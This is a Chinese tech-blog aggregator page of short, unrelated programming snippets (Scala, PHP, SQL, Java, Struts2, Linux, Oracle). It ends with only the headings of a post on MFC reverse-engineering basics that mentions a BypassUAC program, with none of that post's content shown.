scala的option和some 矮蛋蛋编程 scala
原文地址： http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html 对于学习 Scala 的 Java™ 开发人员来说，对象是一个比较自然、简单的入口点。在本系列前几期文章中，我介绍了 Scala 中一些面向对象的编程方法，这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念，找到其缺点
NullPointerException Cb123456 android BaseAdapter
java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference 出现以上异常.然后就在baidu上
PHP使用文件和目录天子之骄 php文件和目录读取和写入 php验证文件 php锁定文件
PHP使用文件和目录 1.使用include()包含文件 (1)：使用include()从一个被包含文档返回一个值 (2)：在控制结构中使用include() include_once()函数需要一个包含文件的路径，此外，第一次调用它的情况和include()一样，如果在脚本执行中再次对同一个文件调用，那么这个文件不会再次包含。在php.ini文件中设置
SQL SELECT DISTINCT 语句何必如此 sql
SELECT DISTINCT 语句用于返回唯一不同的值。 SQL SELECT DISTINCT 语句在表中，一个列可能会包含多个重复值，有时您也许希望仅仅列出不同（distinct）的值。 DISTINCT 关键词用于返回唯一不同的值。 SQL SELECT DISTINCT 语法 SELECT DISTINCT column_name,column_name F
java冒泡排序 3213213333332132 java 冒泡排序
package com.algorithm; /** * @Description 冒泡 * @author FuJianyong * 2015-1-22上午09:58:39 */ public class MaoPao { public static void main(String[] args) { int[] mao = {17,50,26,18,9,10
struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题！ 7454103 DAO spring Ajax json qq
struts2.18 出来有段时间了！（貌似是稳定版）闲时研究下下！貌似 sruts2 搭配 json 做 ajax 很吃香！实践了下下！不当之处请绕过！呵呵网上一大堆 struts2+json 不过大多的json 插件都是 jsonplugin.34.jar strut
struts2 数据标签说明 darkranger jsp bean struts servlet Scheme
数据标签主要用于提供各种数据访问相关的功能，包括显示一个Action里的属性，以及生成国际化输出等功能数据标签主要包括： action ：该标签用于在JSP页面中直接调用一个Action，通过指定executeResult参数，还可将该Action的处理结果包含到本页面来。 bean ：该标签用于创建一个javabean实例。如果指定了id属性，则可以将创建的javabean实例放入Sta
链表.简单的链表节点构建 aijuans 编程技巧
/*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h" #define NODE(name, key_word, help) \ Node name[1]={{NULL, NULL, NULL, key_word, help}} typedef struct node { &nbs
tomcat下jndi的三种配置方式 avords tomcat
jndi(Java Naming and Directory Interface，Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来，使得我们可以用名称访问对象。目录服务是一种命名服务，在这种服务里，对象不但有名称，还有属性。 tomcat配置
关于敏捷的一些想法 houxinyou 敏捷
从网上看到这样一句话：“敏捷开发的最重要目标就是：满足用户多变的需求，说白了就是最大程度的让客户满意。” 感觉表达的不太清楚。感觉容易被人误解的地方主要在“用户多变的需求”上。第一种多变，实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的，只是比较多，也比较混乱，用户一般只能了解自己的那一小部分，所以没有用户能清楚的表达出整体需求。而由于各种条件的，用户表达自己那一部分时也有
富养还是穷养，决定孩子的一生 bijian1013 教育人生
是什么决定孩子未来物质能否丰盛？为什么说寒门很难出贵子，三代才能出贵族？真的是父母必须有钱，才能大概率保证孩子未来富有吗？-----作者：@李雪爱与自由事实并非由物质决定，而是由心灵决定。一朋友富有而且修养气质很好，兄弟姐妹也都如此。她的童年时代，物质上大家都很贫乏，但妈妈总是保持生活中的美感，时不时给孩子们带回一些美好小玩意，从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
oracle 日期时间格式转化征客丶 oracle
oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP； SYSDATE：不支持毫秒，取的是系统时间； SYSTIMESTAMP：支持毫秒，日期，时间是给时区转换的，秒和毫秒是取的系统的。日期转字符窜：一、不取毫秒： TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') 简要说明， YYYY 年 MM 月
【Scala六】分析Spark源代码总结的Scala语法四 bit1129 scala
1. apply语法 FileShuffleBlockManager中定义的类ShuffleFileGroup，定义： private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) { ... def apply(bucketId
Erlang中有意思的bug bookjovi erlang
代码中常有一些很搞笑的bug，如下面的一行代码被调用两次（Erlang beam） commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b Author: Jovi Zhang <[email protected]> Date: Fri Dec 2 16:19:22 2011 +0100 erts:
移位打印10进制数转16进制-2008-08-18 ljy325 java 基础
/** * Description 移位打印10进制的16进制形式 * Creation Date 15-08-2008 9:00 * @author 卢俊宇 * @version 1.0 * */ public class PrintHex { // 备选字符 static final char di
读《研磨设计模式》-代码笔记-组合模式 bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
利用cmd命令将.class文件打包成jar chenyu19891124 cmd jar
cmd命令打jar是如下实现：在运行里输入cmd，利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes) 现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作： cd D: 回车 cd workspace/prpal
[原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 comsci eclipse 设计模式算法工作 swing
JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 &nb
SecureCRT右键粘贴的设置 daizj secureCRT 右键粘贴
一般都习惯鼠标右键自动粘贴的功能，对于SecureCRT6.7.5 ，这个功能也已经是默认配置了。老版本的SecureCRT其实也有这个功能，只是不是默认设置，很多人不知道罢了。菜单： Options->Global Options ...->Terminal 右边有个Mouse的选项块。 Copy on Select Paste on Right/Middle
Linux 软链接和硬链接 dongwei_6688 linux
1.Linux链接概念Linux链接分两种，一种被称为硬链接（Hard Link），另一种被称为符号链接（Symbolic Link）。默认情况下，ln命令产生硬链接。【硬连接】硬连接指通过索引节点来进行连接。在Linux的文件系统中，保存在磁盘分区中的文件不管是什么类型都给它分配一个编号，称为索引节点号(Inode Index)。在Linux中，多个文件名指向同一索引节点是存在的。一般这种连
DIV底部自适应 dcj3sjt126com JavaScript
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml&q
Centos6.5使用yum安装mysql——快速上手必备 dcj3sjt126com mysql
第1步、yum安装mysql [root@stonex ~]# yum -y install mysql-server 安装结果： Installed: mysql-server.x86_64 0:5.1.73-3.el6_5 &nb
如何调试JDK源码 frank1234 jdk
相信各位小伙伴们跟我一样，想通过JDK源码来学习Java，比如collections包，java.util.concurrent包。可惜的是sun提供的jdk并不能查看运行中的局部变量，需要重新编译一下rt.jar。下面是编译jdk的具体步骤： 1.把C:\java\jdk1.6.0_26\sr
Maximal Rectangle hcx2013 max
Given a 2D binary matrix filled with 0's and 1's, find the largest rectangle containing all ones and return its area. public class Solution { public int maximalRectangle(char[][] matrix)
Spring MVC测试框架详解——服务端测试 jinnianshilongnian spring mvc test
随着RESTful Web Service的流行，测试对外的Service是否满足期望也变的必要的。从Spring 3.2开始Spring了Spring Web测试框架，如果版本低于3.2，请使用spring-test-mvc项目（合并到spring3.2中了）。 Spring MVC测试框架提供了对服务器端和客户端（基于RestTemplate的客户端）提供了支持。 &nbs
Linux64位操作系统（CentOS6.6）上如何编译hadoop2.4.0 liyong0802 hadoop
一、准备编译软件 1.在官网下载jdk1.7、maven3.2.1、ant1.9.4，解压设置好环境变量就可以用。环境变量设置如下：（1）执行vim /etc/profile （2）在文件尾部加入: export JAVA_HOME=/home/spark/jdk1.7 export MAVEN_HOME=/ho
StatusBar 字体白色 pangyulei status
[[UIApplication sharedApplication] setStatusBarStyle:UIStatusBarStyleLightContent]; /*you'll also need to set UIViewControllerBasedStatusBarAppearance to NO in the plist file if you use this method
如何分析Java虚拟机死锁 sesame java thread oracle 虚拟机 jdbc
英文资料： Thread Dump and Concurrency Locks Thread dumps are very useful for diagnosing synchronization related problems such as deadlocks on object monitors. Ctrl-\ on Solaris/Linux or Ctrl-B
位运算简介及实用技巧（一）：基础篇 tw_wangzhengquan 位运算
http://www.matrix67.com/blog/archives/263 去年年底写的关于位运算的日志是这个Blog里少数大受欢迎的文章之一，很多人都希望我能不断完善那篇文章。后来我看到了不少其它的资料，学习到了更多关于位运算的知识，有了重新整理位运算技巧的想法。从今天起我就开始写这一系列位运算讲解文章，与其说是原来那篇文章的follow-up，不如说是一个r
jsearch的索引文件结构 yangshangchuan 搜索引擎 jsearch 全文检索信息检索 word分词
jsearch是一个高性能的全文检索工具包，基于倒排索引，基于java8，类似于lucene，但更轻量级。 jsearch的索引文件结构定义如下： 1、一个词的索引由=分割的三部分组成：第一部分是词第二部分是这个词在多少

[系统安全]《黑客免杀攻防》MFC逆向基础实战

文章目录

前驱知识点总结

逆向实战BypassUAC.exe程序

你可能感兴趣的:(系统安全,系统安全,mfc,安全)